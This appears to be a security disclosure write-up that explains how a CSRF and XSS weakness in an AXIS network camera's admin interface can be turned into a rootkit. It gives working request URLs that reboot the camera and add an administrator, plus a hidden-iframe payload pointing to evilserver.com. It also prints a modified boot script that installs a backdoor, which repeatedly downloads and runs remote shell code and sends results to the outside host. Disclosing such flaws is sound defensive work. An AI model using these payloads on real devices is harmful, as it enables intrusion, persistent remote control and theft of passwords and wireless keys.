Administrator CSRF to AXIS rootkit
The entire interface is vulnerable to cross-site request forgery (CSRF) attacks. As a result, if a person is logged in as administrator, and that person is viewing other web pages from the same browser, it is trivial to send commands to the camera that can do all sorts of things, such as:
- Reboot the camera: http://192.168.1.101/axis-cgi/admin/restart.cgi
- Add a new administrator:
http://192.168.1.101/axis-cgi/admin/pwdgrp.cgi?action=add&user= owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment= WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
However, what really makes the existence of a CSRF dangerous is that the filesystem of the AXIS camera is built around Linux and is customizable. In addition, the camera includes enough functionality to allow someone to install a back door via a CSRF/XSS attack. Let's look at how this would work.
The attacker would either have to convince the victim to either view a website he controls or click on a URL that was sent via IM or email. At this point, the XSS/CSRF attack begins by loading a few pages from the attacker's server in hidden IFRAMEs using something like the following:
http://192.168.1.101/admin/restartMessage.shtml?server=<iframe %20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php ><iframe src=http://www.evilserver.com/wifi/axisrb.htm ><!—
What this would do is load a CSRF attack that then submits the following POST to the camera's interface at address /admin-bin/editcgi.cgi?file=/etc/init.d/httpd. If you note, we are editing the httpd file, which is executed each time the camera is booted. In addition, we are also using another XSS vulnerable script. The following is the updated the httpd file:
#! /bin/sh echo "sleep 120" > /tmp/bd echo "while true" >> /tmp/bd echo "do" >> /tmp/bd echo "shttpclient -o /tmp/todo http://evilserver.com/wifi/todo" >> /tmp/bd echo "chmod 777 /tmp/todo" >> /tmp/bd echo "/tmp/todo" >> /tmp/bd echo "RESULTS=\´cat /tmp/results2\´" >> /tmp/bd echo "shttpclient -o /tmp/output.txt http://evilserver.com/wifi/getresults.php?results=\$RESULTS" >> /tmp/bd echo "sleep 60" >> /tmp/bd echo "done" >> /tmp/bd chmod 777 /tmp/bd /tmp/bd& . /etc/init.d/functions.sh . /etc/conf.d/httpd case "$1" in start) begin "Starting web server" start_daemon /bin/boa $BOA_OPTIONS end $? ;; stop) begin "Stopping web server" stop_daemon /bin/boa end $? ;; restart) begin "Restarting web server" stop_daemon /bin/boa start_daemon /bin/boa $BOA_OPTIONS end $? ;; *) error "Usage: $0 start|stop|restart" ;; esac
We added in a few lines at the beginning of the file that essentially create a file called bd in the /tmp directory of the camera. This bd (e.g. backdoor) file is then turned into an executable and launched. This then starts a loop that uses a built-in program called shttpclient to check the evilserver.com for a new todo file that contains shell script to be executed. If the todo script is set up to output data to the output.txt file, then the bd script will post that content back to the Internet.
In other words, your AXIS camera can be rooted and remotely controlled by someone outside your network. Just imagine what can be done (and much more):
- Ping scan your internal network
- Grab banners using an existing copy of Netcat on the camera
- Send http requests to internal web servers and systematically hack them
- Grab the /etc/passwd file of the camera and post it
- Steal the wireless WEP or WPA password that is stored as plaintext in the configuration file
And much more...